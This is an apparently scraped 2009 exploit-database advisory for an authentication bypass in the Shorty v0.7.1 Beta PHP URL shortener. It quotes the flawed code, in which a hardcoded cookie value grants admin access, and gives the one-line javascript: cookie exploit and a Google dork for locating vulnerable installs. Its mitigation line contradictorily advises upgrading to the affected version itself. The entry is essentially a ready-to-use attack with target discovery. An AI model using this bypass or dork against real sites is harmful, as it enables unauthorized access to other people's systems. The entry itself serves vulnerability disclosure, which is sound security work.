Shorty v0.7.1 Beta Authentication Bypass

vendor:

Shorty

by:

milw0rm.com

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Shorty

Affected Version From: Shorty v0.7.1 Beta

Affected Version To: Shorty v0.7.1 Beta

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Shorty v0.7.1 Beta Authentication Bypass

A vulnerability exists in Shorty v0.7.1 Beta, which allows an attacker to bypass authentication by setting the 'snickerdoodle' cookie to 'polarbears'. This can be done by writing 'javascript:document.cookie="snickerdoodle=polarbears";' in the URL or by creating the cookie with a Firefox extension.

Mitigation:

Upgrade to the latest version of Shorty v0.7.1 Beta.

Source

Exploit-DB raw data:

Vulnerable Software
--------------------------------------------------------------------------------
Script: Shorty v0.7.1 Beta (maybe other versions)
URL:http://get-shorty.com/
Download:http://get-shorty.com/beta?force=download
Google dork: intitle:"Shorty (Beta)"

Bug
--------------------------------------------------------------------------------
[functions.php]

45: function authenticate(){
46:     $cookie = @$_COOKIE['snickerdoodle'];
47:     if($cookie == "polarbears"){
48:          //
49:      } else {
50:          exit("Not logged in.");
51:      }
52:  }
53:
54:  function verify(){
55:      if(@$_COOKIE['snickerdoodle']){
56:          $cookie = $_COOKIE['snickerdoodle'];
57:      } else {
58:          $cookie = '';
59:      }
60:      if($cookie == "polarbears"){
61:          return 1;
62:      } else {
63:          return 0;
64:      }
65:  }

[/functions.php]

Exploit
--------------------------------------------------------------------------------
Write in the URL: javascript:document.cookie="snickerdoodle=polarbears"; in
the admin login you want to bypass or create the cookie with you favorite
Firefox extension.

# milw0rm.com [2009-08-12]